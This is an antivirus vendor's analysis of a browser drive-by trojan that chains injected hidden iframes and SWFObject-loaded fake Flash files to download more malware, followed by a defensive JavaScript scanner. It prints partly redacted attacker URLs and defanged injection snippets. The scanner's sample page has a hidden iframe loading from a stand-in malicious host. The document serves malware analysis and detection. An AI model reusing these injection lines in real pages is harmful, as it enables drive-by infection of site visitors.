Trojan.Exploit.ANOH

LOW
LOW
1KB

Symptoms

There are no obvious symptoms.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Ovidiu Visoiu, virus researcher

Technical Description:

It downloads code that tries to exploit a vulnerability in the SWFObject ActiveX Control add-on running in Internet Explorer or Mozilla. SWFObject is used to access Flash media content. A system can be infected while visiting malicious sites that host web pages carrying this malware; the visit is usually forced, for example through an iframe injected into the page the user actually opened, which linked to http://www.wrmfwy.cn/[removed]/18.htm.
Once the script is launched it checks which of the two browsers is in use and then downloads another JavaScript file that continues the infection. To do so, it creates an invisible frame in the accessed web page, linked to an HTML file (resident on the same site) that contains the JavaScript code: ilink.html and xlink.html when downloaded from Internet Explorer, flink.html and mlink.html from Mozilla. The HTML code is of this kind:

    docume[nt.w]rite("[<] [iFra]me src  ilink.html width=100 ...

The newly downloaded scripts are also detected by BitDefender as Trojan.Exploit.ANOI and Trojan.Exploit.SSX. These scripts download and run a fake media file chosen according to the SWFObject add-on version installed on the victim's machine:

    var so=new SWFObject("./i17.swf","mynmovie",...);
    so.write("flashcontent")

The fake SWF (Shockwave Flash animations or applets) files are detected as Exploit.SWF.Gen. Their code tries to download additional malware (Trojan.Downloader.JLCQ) from www.oiuytr.net/[removed]/a264.css and then launch it.
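As an added illustration of how a defender can spot the page-level traces described above (the iframe written into the page through document.write, the invisible frame, and the SWFObject embed), the following static scanner is example code written for this page; it is not Bitdefender's detection logic and not code from the malware. The sample page, the file names beyond those mentioned above, and the domain malicious.example are constructed placeholders, and the scanner expects plain source, not the bracket-defanged form shown in the description.

```javascript
// Added example (not Bitdefender's code): a small static scanner that flags the
// patterns the description mentions: iframes injected through document.write(),
// hidden iframes in the static markup, and SWFObject loads of a .swf file.

// Constructed sample page modelled on the described chain; host and paths are placeholders.
const SAMPLE_PAGE = `
<html><body>
<p>Ordinary page content</p>
<script>
document.write("<iframe src=ilink.html width=100 height=0></iframe>");
</script>
<script src="swfobject.js"></script>
<script>
var so = new SWFObject("./i17.swf", "mymovie", "1", "1", "8");
so.write("flashcontent");
</script>
<iframe src="http://malicious.example/18.htm" style="display:none"></iframe>
</body></html>
`;

const IFRAME_RE = /<\s*iframe\b([^>]*)>/gi;                        // <iframe ...> with its attributes
const DOCWRITE_RE = /document\.write\s*\(([\s\S]*?)\)\s*;?/gi;     // document.write( ... )
const SWFOBJECT_RE = /new\s+SWFObject\s*\(\s*["']([^"']+)["']/gi;  // new SWFObject("<movie>", ...

// Returns the value of one attribute (quoted or bare) from an attribute string, or null.
function attr(attrs, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(attrs);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
}

// An iframe is treated as hidden when a dimension is 0/1 px or inline CSS hides it.
function isHiddenIframe(attrs) {
  const tiny = (v) => v !== null && Number.parseInt(v, 10) <= 1;
  const style = attr(attrs, 'style') || '';
  return tiny(attr(attrs, 'width')) || tiny(attr(attrs, 'height')) ||
         /display\s*:\s*none|visibility\s*:\s*hidden/i.test(style);
}

// Scans HTML/JS source and returns a list of findings {kind, src, hidden}.
function scanPage(html) {
  const findings = [];
  // 1. iframes assembled at runtime inside document.write("...")
  for (const call of html.matchAll(DOCWRITE_RE)) {
    for (const f of call[1].matchAll(IFRAME_RE)) {
      findings.push({ kind: 'docwrite-iframe', src: attr(f[1], 'src'), hidden: isHiddenIframe(f[1]) });
    }
  }
  // 2. hidden iframes in the remaining static markup (document.write calls stripped first
  //    so the same frame is not counted twice)
  const staticHtml = html.replace(DOCWRITE_RE, '');
  for (const f of staticHtml.matchAll(IFRAME_RE)) {
    if (isHiddenIframe(f[1])) {
      findings.push({ kind: 'hidden-iframe', src: attr(f[1], 'src'), hidden: true });
    }
  }
  // 3. SWFObject embeds: normal on their own, but worth review next to findings from 1 or 2
  for (const s of html.matchAll(SWFOBJECT_RE)) {
    findings.push({ kind: 'swfobject-load', src: s[1], hidden: false });
  }
  return findings;
}

// A page is flagged when it contains any injected or hidden iframe; a bare SWF embed is not enough.
function isSuspicious(findings) {
  return findings.some((f) => f.kind !== 'swfobject-load');
}

if (typeof require !== 'undefined' && require.main === module) {
  const findings = scanPage(SAMPLE_PAGE);
  for (const f of findings) console.log(f.kind, f.src, f.hidden ? '(hidden)' : '');
  console.log(isSuspicious(findings) ? 'SUSPICIOUS' : 'clean');
}
```

Run with node on a saved page source to list the frames and embeds it contains; the verdict deliberately keys on the injected or hidden iframe, since SWFObject itself was a legitimate library and only the combination with a forced, invisible frame matches the chain described here.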